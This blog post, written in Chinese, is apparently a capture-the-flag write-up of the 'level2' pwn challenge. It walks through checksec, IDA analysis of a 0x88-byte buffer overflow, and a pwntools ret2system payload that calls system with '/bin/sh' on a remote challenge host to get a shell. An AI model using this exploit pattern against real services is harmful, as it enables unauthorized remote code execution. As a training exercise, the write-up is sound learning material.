前言
书本知识学的差不多了,是时候不看题解来自己做题了(雾)
正文
攻防世界新手区pwn第一题——level2
下过来附件就一个,没有libc可以连,应该是很适合萌新的
先用虚拟机checksec 看保护,顺便连一下看看
感动,32位小端序,保护只开了一个NX
好像输入什么都会返回123
打开ida反汇编看看
有这么多函数,从main入手
已经有一点汇编基础了,勉强能看懂。
但还是F5查看伪代码看的爽快
双击第一个函数进去看看
这里已经可以看到是一个简单的栈溢出了。因为定义buf是0x88个字节,我们却可以read入0x100个字节,那么可以利用多出的字节把ebp,ret覆盖掉
双击buf
然后往下拉过属于buf自己的0x88个字节
这里的s就是ebp的长度,因为是32位,所以有4字节,然后r就是返回地址,也是4字节
这里已经有思路了,现在只要知道ret到哪里可以得到shell就行
刚才main函数里有个system很是敏感
双击进去,然后找到起始位置
然后搜索下bin/sh,真的有
开始写exp
首先from pwn import * 调用pwntools库
然后dog = remote(’ 220.249.52.133’,33973)连接
system = 0x08048320
bin/sh地址 binshaddr = 0x0804A024
按照之前的,先用88个a填满,然后再来4个覆盖ebp,之后用p32(“system”)覆盖掉ret返回的值,之所以加p32是为了转化成小端序。ret了system之后,需要构造system函数的栈帧。
让我们回想一下函数调用栈的时候是如何调用栈帧的:先压入ebp,然后再把参数压进去。所以我们继续构造上 ‘aaaa’ 填补地址,然后就是传参,当然要给system函数传它最爱吃的bin/sh啦,加上p32(binshaddr)
最终构造出
payload = ‘a’ *(0x88+0x04) + p32(system) + ‘aaaa’ + p32(binshaddr)
发送dog.send(payload)
交互dog.interactive()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
